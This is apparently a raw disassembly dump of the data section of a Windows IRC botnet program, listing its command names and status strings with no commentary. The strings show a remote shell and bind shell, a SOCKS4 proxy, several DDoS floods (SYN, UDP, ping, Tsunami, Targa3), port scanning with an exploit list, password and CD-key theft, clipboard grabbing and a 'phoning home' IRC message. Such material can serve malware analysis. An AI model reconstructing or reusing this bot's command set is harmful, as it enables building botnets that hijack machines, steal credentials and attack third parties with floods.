asc_42EED4 db '-' ; DATA XREF: sub_40274D+263B�o
db 3, 34h, 2
dd 2676F6Ch, 4C202D03h, 69747369h, 6C20676Eh, 2E676Fh
dword_42EEEC dd 234032Dh, 6E69616Dh, 202D0302h, 7774654Eh, 206B726Fh
; DATA XREF: sub_40274D+25A7�o
dd 6F666E49h, 2Eh
dword_42EF08 dd 234032Dh, 6E69616Dh, 202D0302h, 74737953h, 49206D65h
; DATA XREF: sub_40274D+2578�o
dd 2E6F666Eh, 0
dword_42EF24 dd 234032Dh, 6E69616Dh, 202D0302h, 6F6D6552h, 676E6976h
; DATA XREF: sub_40274D+252B�o
dd 746F4220h, 2Eh
; char asc_42EF40[]
asc_42EF40 db '-' ; DATA XREF: sub_40274D+24FA�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToSta_23 db ' Failed to start listing thread, error: <%d>.',0
align 4
; char asc_42EF7C[]
asc_42EF7C db '-' ; DATA XREF: sub_40274D+249B�o
db 3, 34h, 2
dd 636F7270h, 2D030273h, 6F725020h, 73656363h, 696C2073h
dd 2E7473h
; char aFull[]
aFull db 'full',0 ; DATA XREF: sub_40274D+247B�o
align 10h
unk_42EFA0 db 2Dh ; - ; DATA XREF: sub_40274D+2425�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aAlreadyRunni_3 db ' Already running.',0
align 10h
; char asc_42EFC0[]
asc_42EFC0 db '-' ; DATA XREF: sub_40274D+23FC�o
db 3, 34h, 2
dd 656B6463h, 3027379h
aSearchComplete db '- Search completed.',0
; char asc_42EFE0[]
asc_42EFE0 db '-' ; DATA XREF: sub_40274D+23B6�o
db 3, 34h, 2
dd 6E69616Dh, 202D0302h, 69747055h, 203A656Dh, 2E7325h
; char asc_42EFF8[]
asc_42EFF8 db '-' ; DATA XREF: sub_40274D:loc_404A48�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteShellRea db '- Remote shell ready.',0
align 4
unk_42F018 db 2Dh ; - ; DATA XREF: sub_40274D+22F4�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldnTOpenRem db '- Couldn',27h,'t open remote shell.',0
align 10h
unk_42F040 db 2Dh ; - ; DATA XREF: sub_40274D+22DB�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteShellAlr db '- Remote shell already running.',0
align 4
dword_42F06C dd 234032Dh, 6E69616Dh, 202D0302h, 20746547h, 70696C43h
; DATA XREF: sub_40274D+22C0�o
dd 72616F62h, 2E64h
dword_42F088 dd 234032Dh, 70696C63h, 72616F62h, 61642064h, 3026174h
; DATA XREF: sub_40274D+2298�o
dd 2Dh
unk_42F0A0 db 2Dh ; - ; DATA XREF: sub_40274D:loc_4049D5�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToFlushA db 'Failed to flush ARP cache.',0
align 4
unk_42F0CC db 2Dh ; - ; DATA XREF: sub_40274D+2281�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aArpCacheFlushe db 'ARP cache flushed.',0
align 10h
; char asc_42F0F0[]
asc_42F0F0 db '-' ; DATA XREF: sub_40274D:loc_4049A4�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToLoadDn db 'Failed to load dnsapi.dll.',0
align 4
unk_42F11C db 2Dh ; - ; DATA XREF: sub_40274D:loc_40499D�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aFailedToFlushD db 'Failed to flush DNS cache.',0
align 4
unk_42F148 db 2Dh ; - ; DATA XREF: sub_40274D+2249�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aDnsCacheFlushe db 'DNS cache flushed.',0
align 4
; char asc_42F16C[]
asc_42F16C db '-' ; DATA XREF: sub_40274D+21C8�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToSta_24 db '- Failed to start server thread, error: <%d>.',0
align 4
; char asc_42F1A8[]
asc_42F1A8 db '-' ; DATA XREF: sub_40274D+216F�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aServerListenin db '- Server listening on IP: %s:%d, Username: %s.',0
unk_42F1E4 db 2Dh ; - ; DATA XREF: sub_40274D+209D�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_25 db ' Failed to start server thread, error: <%d>.',0
align 10h
; char asc_42F220[]
asc_42F220 db '-' ; DATA XREF: sub_40274D+2044�o
; sub_40B690+440�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aServerListen_0 db ' Server listening on IP: %s:%d, Directory: %s\.',0
unk_42F25C db 2Dh ; - ; DATA XREF: sub_40274D+1F31�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_26 db ' Failed to start server thread, error: <%d>.',0
align 4
; char asc_42F298[]
asc_42F298 db '-' ; DATA XREF: sub_40274D+1ED8�o
; sub_40B690+D7�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aServerStarte_1 db ' Server started on Port: %d, File: %s.',0
align 4
unk_42F2CC db 2Dh ; - ; DATA XREF: sub_40274D+1E34�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aAlreadyRunni_4 db ' Already running.',0
align 4
unk_42F2EC db 2Dh ; - ; DATA XREF: sub_40274D:loc_40456B�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aFailedToSta_27 db '- Failed to start scan, port is invalid.',0
align 4
; char asc_42F324[]
asc_42F324 db '-' ; DATA XREF: sub_40274D+1DBF�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aFailedToSta_28 db '- Failed to start scan thread, error: <%d>.',0
align 10h
; char asc_42F360[]
asc_42F360 db '-' ; DATA XREF: sub_40274D+1D60�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aSPortScanSta_0 db '- %s Port Scan started on %s:%d with a delay of %d seconds for %d'
db ' minutes using %d threads.',0
align 4
aSequential db 'Sequential',0 ; DATA XREF: sub_40274D+1D35�o
; sub_40274D+5909�o
align 4
aRandom db 'Random',0 ; DATA XREF: sub_40274D+1D2E�o
; sub_40274D+5902�o
align 10h
; char asc_42F3E0[]
asc_42F3E0 db '-' ; DATA XREF: sub_40274D+1B80�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 61h ; a
db 2 dup(6Ch), 2
db 3
aAlreadyDScan_0 db '- Already %d scanning threads. Too many specified.',0
unk_42F420 db 2Dh ; - ; DATA XREF: sub_40274D+1B0D�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aFailedToSta_29 db 'Failed to start search thread, error: <%d>.',0
; char asc_42F45C[]
asc_42F45C db '-' ; DATA XREF: sub_40274D+1AA3�o
db 3, 34h, 2
db 66h ; f
db 69h, 6Eh, 64h
db 70h ; p
db 61h, 2 dup(73h)
db 2
db 3, 2Dh, 20h
aSearchingForPa db 'Searching for password.',0
; char aFp[]
aFp db 'fp',0 ; DATA XREF: sub_40274D+1A66�o
align 4
; char aFindpass[]
aFindpass db 'findpass',0 ; DATA XREF: sub_40274D+1A55�o
align 4
; char aNoticeSPhoning[]
aNoticeSPhoning db 'NOTICE %s :PHONING HOME: hi ;).',0Dh,0Ah,0 ; DATA XREF: sub_40274D+1A3F�o
align 4
; char aPhonehome[]
aPhonehome db 'phonehome',0 ; DATA XREF: sub_40274D+1A28�o
align 4
; char aScanall[]
aScanall db 'scanall',0 ; DATA XREF: sub_40274D+19FE�o
; char asc_42F4CC[]
asc_42F4CC db '-' ; DATA XREF: sub_40274D+19B1�o
db 3, 34h, 2
dd 6E69616Dh, 202D0302h, 73617243h, 676E6968h, 746F6220h
dd 2Eh
; char aCrash[]
aCrash db 'crash',0 ; DATA XREF: sub_40274D+199B�o
; sub_40274D+19E8�o
align 10h
; char aTftp[]
aTftp db 'tftp',0 ; DATA XREF: sub_40274D+1986�o
align 4
; char aTftpserver[]
aTftpserver db 'tftpserver',0 ; DATA XREF: sub_40274D+1971�o
align 4
; char aHttp[]
aHttp db 'http',0 ; DATA XREF: sub_40274D+195C�o
align 4
; char aHttpserver[]
aHttpserver db 'httpserver',0 ; DATA XREF: sub_40274D+1947�o
align 4
; char aRlogin[]
aRlogin db 'rlogin',0 ; DATA XREF: sub_40274D+1932�o
align 10h
; char aRloginserver[]
aRloginserver db 'rloginserver',0 ; DATA XREF: sub_40274D+191D�o
align 10h
; char aCip[]
aCip db 'cip',0 ; DATA XREF: sub_40274D+1908�o
; char aCurrentip[]
aCurrentip db 'currentip',0 ; DATA XREF: sub_40274D+18F3�o
align 10h
; char aFdns[]
aFdns db 'fdns',0 ; DATA XREF: sub_40274D+18DE�o
align 4
; char aFlushdns[]
aFlushdns db 'flushdns',0 ; DATA XREF: sub_40274D+18C9�o
align 4
; char aFarp[]
aFarp db 'farp',0 ; DATA XREF: sub_40274D+18B4�o
align 4
; char aFlusharp[]
aFlusharp db 'flusharp',0 ; DATA XREF: sub_40274D+189F�o
align 4
; char aGc[]
aGc db 'gc',0 ; DATA XREF: sub_40274D+188A�o
align 4
; char aGetclip[]
aGetclip db 'getclip',0 ; DATA XREF: sub_40274D+1875�o
; char asc_42F574[]
asc_42F574 db '-' ; DATA XREF: sub_40274D+183D�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 73h
db 70h ; p
db 2 dup(6Fh), 66h
db 29h ; )
db 2, 3, 2Dh
aSpoofingDisabl db ' Spoofing disabled.',0
; char Str2[]
Str2 db 'off',0 ; DATA XREF: sub_40274D+1822�o
; sub_40274D+39C9�o ...
; char aSpoof[]
aSpoof db 'spoof',0 ; DATA XREF: sub_40274D+180B�o
align 4
unk_42F5A8 db 2Dh ; - ; DATA XREF: sub_40274D+17F0�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aLoginListCompl db 'Login list complete.',0
align 4
; char aD_S[]
aD_S db '%d. %s',0 ; DATA XREF: sub_40274D+17BB�o
; sub_40AEF0+46�o
align 4
aEmpty db '<Empty>',0 ; DATA XREF: sub_40274D:loc_403EF9�o
dword_42F5DC dd 234032Dh, 69676F6Ch, 696C206Eh, 3027473h, 2Dh
; DATA XREF: sub_40274D+1784�o
; char aWho[]
aWho db 'who',0 ; DATA XREF: sub_40274D+1767�o
dword_42F5F4 dd 234032Dh, 2646D63h, 2D03h ; DATA XREF: sub_40274D+175C�o
aRemoteShell db 'Remote shell',0 ; DATA XREF: sub_40274D+1757�o
align 10h
; char aCmdstop[]
aCmdstop db 'cmdstop',0 ; DATA XREF: sub_40274D+1741�o
; char aOcmd[]
aOcmd db 'ocmd',0 ; DATA XREF: sub_40274D+172C�o
align 10h
; char aOpencmd[]
aOpencmd db 'opencmd',0 ; DATA XREF: sub_40274D+1717�o
; char aDll[]
aDll db 'dll',0 ; DATA XREF: sub_40274D+1702�o
; char aTestdlls[]
aTestdlls db 'testdlls',0 ; DATA XREF: sub_40274D+16ED�o
align 4
; char aDrv[]
aDrv db 'drv',0 ; DATA XREF: sub_40274D+16D8�o
; char aDriveinfo[]
aDriveinfo db 'driveinfo',0 ; DATA XREF: sub_40274D+16C3�o
align 4
; char aUp[]
aUp db 'up',0 ; DATA XREF: sub_40274D+16AE�o
; sub_40274D+4864�o
align 4
; char aUptime[]
aUptime db 'uptime',0 ; DATA XREF: sub_40274D+1699�o
align 4
; char aKey[]
aKey db 'key',0 ; DATA XREF: sub_40274D+1684�o
; char aGetcdkeys[]
aGetcdkeys db 'getcdkeys',0 ; DATA XREF: sub_40274D+166F�o
align 4
; char aPs[]
aPs db 'ps',0 ; DATA XREF: sub_40274D+165A�o
align 4
; char aProcs[]
aProcs db 'procs',0 ; DATA XREF: sub_40274D+1645�o
align 10h
; char aRm[]
aRm db 'rm',0 ; DATA XREF: sub_40274D+1630�o
align 4
; char aRemove[]
aRemove db 'remove',0 ; DATA XREF: sub_40274D+161B�o
align 4
; char aSi[]
aSi db 'si',0 ; DATA XREF: sub_40274D+1606�o
align 10h
; char aSysinfo[]
aSysinfo db 'sysinfo',0 ; DATA XREF: sub_40274D+15F1�o
; char aNi[]
aNi db 'ni',0 ; DATA XREF: sub_40274D+15DC�o
align 4
; char aNetinfo[]
aNetinfo db 'netinfo',0 ; DATA XREF: sub_40274D+15C7�o
; char aClg[]
aClg db 'clg',0 ; DATA XREF: sub_40274D+15B2�o
; char aClearlog[]
aClearlog db 'clearlog',0 ; DATA XREF: sub_40274D+159D�o
align 4
; char aLg[]
aLg db 'lg',0 ; DATA XREF: sub_40274D+1588�o
align 4
; char aLog[]
aLog db 'log',0 ; DATA XREF: sub_40274D+1573�o
; ___libm_error_support:loc_424419�o ...
; char aAl[]
aAl db 'al',0 ; DATA XREF: sub_40274D+155E�o
align 10h
; char aAliases[]
aAliases db 'aliases',0 ; DATA XREF: sub_40274D+1549�o
; char aT[]
aT: ; DATA XREF: sub_40274D+1534�o
; .data:00442EE0�o ...
unicode 0, <t>,0
; char aThreads[]
aThreads db 'threads',0 ; DATA XREF: sub_40274D+151F�o
unk_42F6C4 db 2Dh ; - ; DATA XREF: sub_40274D+14EE�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToReboot db 'Failed to reboot system.',0
align 4
; char asc_42F6EC[]
asc_42F6EC db '-' ; DATA XREF: sub_40274D+14E7�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aRebootingSyste db 'Rebooting system.',0
align 4
; char aReboot[]
aReboot db 'reboot',0 ; DATA XREF: sub_40274D+14D0�o
align 4
; char aI[]
aI: ; DATA XREF: sub_40274D+14BB�o
; .data:00442EEC�o ...
unicode 0, <i>,0
; char aId[]
aId db 'id',0 ; DATA XREF: sub_40274D+14A6�o
align 4
; char aS_6[]
aS_6: ; DATA XREF: sub_40274D+1491�o
; .data:00442EF8�o ...
unicode 0, <s>,0
; char aStatus[]
aStatus db 'status',0 ; DATA XREF: sub_40274D+147C�o
align 4
; char aQ[]
aQ: ; DATA XREF: sub_40274D+1467�o
; .data:off_442ED0�o ...
unicode 0, <q>,0
; char aQuit_0[]
aQuit_0 db 'quit',0 ; DATA XREF: sub_40274D+1452�o
align 4
; char aDc[]
aDc db 'dc',0 ; DATA XREF: sub_40274D+143D�o
align 4
; char aDisconnect[]
aDisconnect db 'disconnect',0 ; DATA XREF: sub_40274D+1428�o
align 4
; char aR[]
aR: ; DATA XREF: sub_40274D+1413�o
; sub_40274D+3ABF�o ...
unicode 0, <r>,0
; char aReconnect[]
aReconnect db 'reconnect',0 ; DATA XREF: sub_40274D+13FE�o
align 4
; char aExplist[]
aExplist db 'explist',0 ; DATA XREF: sub_40274D+13E9�o
; char aExploitlist[]
aExploitlist db 'exploitlist',0 ; DATA XREF: sub_40274D+13D4�o
; char aCbstats[]
aCbstats db 'cbstats',0 ; DATA XREF: sub_40274D+13BF�o
; char aConnectbacksta[]
aConnectbacksta db 'connectbackstats',0 ; DATA XREF: sub_40274D+13AA�o
align 4
; char aTrstats[]
aTrstats db 'trstats',0 ; DATA XREF: sub_40274D+1395�o
; char aTransferstats[]
aTransferstats db 'transferstats',0 ; DATA XREF: sub_40274D+1380�o
align 4
; char aStats[]
aStats db 'stats',0 ; DATA XREF: sub_40274D+136B�o
align 4
; char aScanstats[]
aScanstats db 'scanstats',0 ; DATA XREF: sub_40274D+1356�o
align 10h
dword_42F7B0 dd 234032Dh, 6E616373h, 2D0302h ; DATA XREF: sub_40274D+134B�o
aScan db 'Scan',0 ; DATA XREF: sub_40274D+1346�o
align 4
; char aScanstop[]
aScanstop db 'scanstop',0 ; DATA XREF: sub_40274D+1330�o
align 10h
dword_42F7D0 dd 234032Dh, 75636573h, 3026572h, 2Dh ; DATA XREF: sub_40274D+1325�o
aSecure_0 db 'Secure',0 ; DATA XREF: sub_40274D+1320�o
align 4
; char aSecurestop[]
aSecurestop db 'securestop',0 ; DATA XREF: sub_40274D+130A�o
align 4
dword_42F7F4 dd 234032Dh, 6E6F6C63h, 3027365h, 2Dh ; DATA XREF: sub_40274D+12FF�o
aClone db 'Clone',0 ; DATA XREF: sub_40274D+12FA�o
align 4
; char aClonestop[]
aClonestop db 'clonestop',0 ; DATA XREF: sub_40274D+12E4�o
align 4
; char aPsstop[]
aPsstop db 'psstop',0 ; DATA XREF: sub_40274D+12CF�o
align 10h
; char aProcsstop[]
aProcsstop db 'procsstop',0 ; DATA XREF: sub_40274D+12BA�o
align 4
; char aFfstop[]
aFfstop db 'ffstop',0 ; DATA XREF: sub_40274D+12A5�o
align 4
; char aFindfilestop[]
aFindfilestop db 'findfilestop',0 ; DATA XREF: sub_40274D+1290�o
align 4
dword_42F844 dd 234032Dh, 70746674h, 2D030264h, 0 ; DATA XREF: sub_40274D+1285�o
; char aTftpstop[]
aTftpstop db 'tftpstop',0 ; DATA XREF: sub_40274D+126A�o
align 10h
; char aPingstop[]
aPingstop db 'pingstop',0 ; DATA XREF: sub_40274D+1244�o
align 4
; char aUdpstop[]
aUdpstop db 'udpstop',0 ; DATA XREF: sub_40274D+121E�o
; char aWisdomstop[]
aWisdomstop db 'wisdomstop',0 ; DATA XREF: sub_40274D+11F8�o
align 10h
; char aTsunamistop[]
aTsunamistop db 'tsunamistop',0 ; DATA XREF: sub_40274D+11D2�o
unk_42F88C db 2Dh ; - ; DATA XREF: sub_40274D+11BB�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aAllPacketingAc db 'All packeting activity has been halted.',0
dword_42F8C0 dd 234032Dh, 64736977h, 3026D6Fh, 2Dh ; DATA XREF: sub_40274D+1186�o
; sub_40274D+1213�o
aWisdomAttack db 'Wisdom attack',0 ; DATA XREF: sub_40274D+1181�o
; sub_40274D+120E�o
align 10h
dword_42F8E0 dd 234032Dh, 6E757374h, 2696D61h, 2D03h ; DATA XREF: sub_40274D+116B�o
; sub_40274D+11ED�o
aTsunamiFlood db 'Tsunami flood',0 ; DATA XREF: sub_40274D+1166�o
; sub_40274D+11E8�o
align 10h
dword_42F900 dd 234032Dh, 676E6970h, 2D0302h ; DATA XREF: sub_40274D+1114�o
; sub_40274D+125F�o
aPingFlood db 'Ping flood',0 ; DATA XREF: sub_40274D+110F�o
; sub_40274D+125A�o
align 4
dword_42F918 dd 234032Dh, 2706475h, 2D03h ; DATA XREF: sub_40274D+10F9�o
; sub_40274D+1239�o
aUdpFlood db 'UDP flood',0 ; DATA XREF: sub_40274D+10F4�o
; sub_40274D+1234�o
align 10h
; char aPacketstop[]
aPacketstop db 'packetstop',0 ; DATA XREF: sub_40274D+109D�o
align 4
dword_42F93C dd 234032Dh, 6B6E6F77h, 2D0302h ; DATA XREF: sub_40274D+1092�o
; sub_40274D+114D�o
aWonkFlood db 'Wonk flood',0 ; DATA XREF: sub_40274D+108D�o
; sub_40274D+1148�o
align 4
; char aWonkstop[]
aWonkstop db 'wonkstop',0 ; DATA XREF: sub_40274D+1077�o
align 10h
dword_42F960 dd 234032Dh, 67726174h, 3023361h, 2Dh ; DATA XREF: sub_40274D+106C�o
; sub_40274D+1132�o
aTarga3Flood db 'Targa3 flood',0 ; DATA XREF: sub_40274D+1067�o
; sub_40274D+112D�o
align 10h
; char aTarga3stop[]
aTarga3stop db 'targa3stop',0 ; DATA XREF: sub_40274D+1051�o
align 4
dword_42F98C dd 234032Dh, 73796B73h, 3026E79h, 2Dh ; DATA XREF: sub_40274D+1046�o
; sub_40274D+11A4�o
aSkysynFlood db 'SkySyn flood',0 ; DATA XREF: sub_40274D+1041�o
; sub_40274D+119F�o
align 4
; char aSkysynstop[]
aSkysynstop db 'skysynstop',0 ; DATA XREF: sub_40274D+102B�o
align 4
dword_42F9B8 dd 234032Dh, 26E7973h, 2D03h ; DATA XREF: sub_40274D+1020�o
; sub_40274D+10DB�o
aSynFlood db 'Syn flood',0 ; DATA XREF: sub_40274D+101B�o
; sub_40274D+10D6�o
align 10h
; char aSynstop[]
aSynstop db 'synstop',0 ; DATA XREF: sub_40274D+1005�o
dword_42F9D8 dd 234032Dh, 736F6464h, 2D0302h ; DATA XREF: sub_40274D+FFA�o
; sub_40274D+10C0�o
aDdosFlood db 'DDoS flood',0 ; DATA XREF: sub_40274D+FF5�o
; sub_40274D+10BB�o
align 10h
; char aDdos_stop[]
aDdos_stop db 'ddos.stop',0 ; DATA XREF: sub_40274D+FDF�o
align 4
dword_42F9FC dd 234032Dh, 69646572h, 74636572h, 2D0302h ; DATA XREF: sub_40274D+FD4�o
aTcpRedirect db 'TCP redirect',0 ; DATA XREF: sub_40274D+FCF�o
align 4
; char aRedirectstop[]
aRedirectstop db 'redirectstop',0 ; DATA XREF: sub_40274D+FB9�o
align 4
dword_42FA2C dd 234032Dh, 2676F6Ch, 2D03h ; DATA XREF: sub_40274D+FAE�o
aLogList db 'Log list',0 ; DATA XREF: sub_40274D+FA9�o
align 4
; char aLogstop[]
aLogstop db 'logstop',0 ; DATA XREF: sub_40274D+F93�o
dword_42FA4C dd 234032Dh, 70747468h, 2D030264h, 0 ; DATA XREF: sub_40274D+F88�o
; char aHttpstop[]
aHttpstop db 'httpstop',0 ; DATA XREF: sub_40274D+F6D�o
align 4
dword_42FA68 dd 234032Dh, 676F6C72h, 2646E69h, 2D03h ; DATA XREF: sub_40274D+F62�o
; char aRloginstop[]
aRloginstop db 'rloginstop',0 ; DATA XREF: sub_40274D+F47�o
align 4
dword_42FA84 dd 234032Dh, 6B636F73h, 3023473h, 2Dh ; DATA XREF: sub_40274D+F3C�o
; char aSocks4stop[]
aSocks4stop db 'socks4stop',0 ; DATA XREF: sub_40274D+F21�o
align 10h
; char aS4[]
aS4 db 's4',0 ; DATA XREF: sub_40274D+F0C�o
align 4
; char aSocks4[]
aSocks4 db 'socks4',0 ; DATA XREF: sub_40274D+EF7�o
align 4
dword_42FAAC dd 234032Dh, 646E6962h, 6C656873h, 2D03026Ch, 0 ; DATA XREF: sub_40274D+EEC�o
aServer_0 db 'Server',0 ; DATA XREF: sub_40274D+EE7�o
; sub_40274D+F37�o ...
align 4
; char aBindshellstop[]
aBindshellstop db 'bindshellstop',0 ; DATA XREF: sub_40274D+ED1�o
align 4
; char aBd[]
aBd db 'bd',0 ; DATA XREF: sub_40274D+EBC�o
align 4
; char aBindshell[]
aBindshell db 'bindshell',0 ; DATA XREF: sub_40274D+EA7�o
align 4
; char aUnsec[]
aUnsec db 'unsec',0 ; DATA XREF: sub_40274D+E92�o
align 10h
; char aUnsecure[]
aUnsecure db 'unsecure',0 ; DATA XREF: sub_40274D+E7D�o
align 4
; char aSec[]
aSec db 'sec',0 ; DATA XREF: sub_40274D+E68�o
; sub_40274D+2B4D�o
; char aSecure[]
aSecure db 'secure',0 ; DATA XREF: sub_40274D+E53�o
; sub_40274D+2B3C�o
align 4
; char aSt[]
aSt db 'st',0 ; DATA XREF: sub_40274D+E3E�o
align 4
; char aSpeedtest[]
aSpeedtest db 'speedtest',0 ; DATA XREF: sub_40274D+E29�o
align 4
; char aDed[]
aDed db 'ded',0 ; DATA XREF: sub_40274D+E14�o
; char aDedication[]
aDedication db 'dedication',0 ; DATA XREF: sub_40274D+DFF�o
align 4
; char aVer[]
aVer db 'ver',0 ; DATA XREF: sub_40274D+DEA�o
; char aVersion[]
aVersion db 'version',0 ; DATA XREF: sub_40274D+DD5�o
; char aLo[]
aLo db 'lo',0 ; DATA XREF: sub_40274D+DC0�o
align 4
; char aLogout[]
aLogout db 'logout',0 ; DATA XREF: sub_40274D+DAB�o
align 10h
; char aD_0[]
aD_0: ; DATA XREF: sub_40274D+D96�o
; sub_40FDC3+7F�o ...
unicode 0, <d>,0
; char aDie[]
aDie db 'die',0 ; DATA XREF: sub_40274D+D81�o
; char aRn[]
aRn db 'rn',0 ; DATA XREF: sub_40274D+D6C�o
align 4
; char aRndnick_0[]
aRndnick_0 db 'rndnick',0 ; DATA XREF: sub_40274D+D54�o
; char Source[]
Source db '63',0 ; DATA XREF: sub_40274D+C4D�o
align 4
; char asc_42FB58[]
asc_42FB58: ; DATA XREF: sub_40274D+C2E�o
unicode 0, <)>,0
; char aChr[]
aChr db '$chr(',0 ; DATA XREF: sub_40274D+BFA�o
align 4
; char aServer[]
aServer db '$server',0 ; DATA XREF: sub_40274D+BEF�o
; char aRndnick[]
aRndnick db '$rndnick',0 ; DATA XREF: sub_40274D+BDE�o
align 4
; char aChan[]
aChan db '$chan',0 ; DATA XREF: sub_40274D+BC5�o
align 10h
; char aUser[]
aUser db '$user',0 ; DATA XREF: sub_40274D+BB7�o
align 4
; char aMe[]
aMe db '$me',0 ; DATA XREF: sub_40274D+BA5�o
; char aD_1[]
aD_1 db '$%d',0 ; DATA XREF: sub_40274D+B43�o
; char aD[]
aD db '$%d-',0 ; DATA XREF: sub_40274D+AA5�o
align 4
; char asc_42FB98[]
asc_42FB98: ; DATA XREF: sub_40274D+9D0�o
; .data:00442F14�o ...
unicode 0, <l>,0
unk_42FB9C db 2Dh ; - ; DATA XREF: sub_40274D+995�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatFailedByUn db '- Chat failed by unauthorized user: %s.',0
align 10h
unk_42FBD0 db 2Dh ; - ; DATA XREF: sub_40274D+984�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatAlreadyAct db '- Chat already active with user: %s.',0
align 10h
unk_42FC00 db 2Dh ; - ; DATA XREF: sub_40274D+95E�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToSta_30 db '- Failed to start chat thread, error: <%d>.',0
align 4
; char asc_42FC38[]
asc_42FC38 db '-' ; DATA XREF: sub_40274D+905�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatFromUserS_ db '- Chat from user: %s.',0
align 4
; char aChat[]
aChat db 'CHAT',0 ; DATA XREF: sub_40274D+877�o
align 10h
; char asc_42FC60[]
asc_42FC60 db '-' ; DATA XREF: sub_40274D+860�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceiveFileSFa db '- Receive file: ',27h,'%s',27h,' failed from unauthorized user: %s.',0
align 4
dword_42FCA4 dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_40274D+830�o
dd 0A0Dh
; char dword_42FCBC
dword_42FCBC dd 4E495001h, 47h ; DATA XREF: sub_40274D+802�o
dword_42FCC4 dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_40274D+7F7�o
dd 0D017325h, 0Ah
; char dword_42FCE0
dword_42FCE0 dd 52455601h, 4E4F4953h, 1 ; DATA XREF: sub_40274D+7C9�o
; char asc_42FCEC[]
asc_42FCEC db '#',0 ; DATA XREF: sub_40274D+755�o
; sub_40E916+1B�o
align 10h
unk_42FCF0 db 2Dh ; - ; DATA XREF: sub_40274D+72C�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToSta_31 db '- Failed to start transfer thread, error: <%d>.',0
align 4
; char asc_42FD2C[]
asc_42FD2C db '-' ; DATA XREF: sub_40274D+6CF�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceiveFileSFr db '- Receive file: ',27h,'%s',27h,' from user: %s.',0
align 4
; char aSend_0[]
aSend_0 db 'SEND',0 ; DATA XREF: sub_40274D+638�o
align 4
; char dword_42FD64
dword_42FD64 dd 43434401h, 0 ; DATA XREF: sub_40274D+61D�o
; char a332[]
a332 db '332',0 ; DATA XREF: sub_40274D+5BA�o
; sub_40274D+9EC�o ...
; char asc_42FD70[]
asc_42FD70 db '-' ; DATA XREF: sub_40274D+54A�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedOut db 'User: %s logged out.',0
align 4
unk_42FD94 db 2Dh ; - ; DATA XREF: sub_40274D+52A�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aJoinedChanne_0 db 'Joined channel: %s.',0
; char a353[]
a353 db '353',0 ; DATA XREF: sub_40274D+4F9�o
; char aQuit[]
aQuit db 'QUIT',0 ; DATA XREF: sub_40274D+4C2�o
; sub_411B17+5A3�o
align 10h
; char aPart[]
aPart db 'PART',0 ; DATA XREF: sub_40274D+4B1�o
; sub_40274D+564�o
align 4
; char aSS_1[]
